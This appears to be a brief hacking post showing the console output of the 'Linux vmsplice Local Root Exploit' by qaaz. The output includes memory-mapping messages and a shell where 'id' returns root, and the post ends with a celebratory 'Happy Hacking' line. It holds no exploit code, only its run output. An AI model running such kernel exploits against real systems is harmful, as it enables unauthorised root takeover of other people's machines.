rootme.c:289:28: warning: no newline at end of file
-----------------------------------
 Linux vmsplice Local Root Exploit
 By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7d6e000 .. 0xb7da0000
[+] root
[email protected]:/tmp# id
uid=0(root) gid=0(root) groups=100(users)
[email protected]:/tmp#

Bango! I got root access. Thanks for reading. Happy Hacking.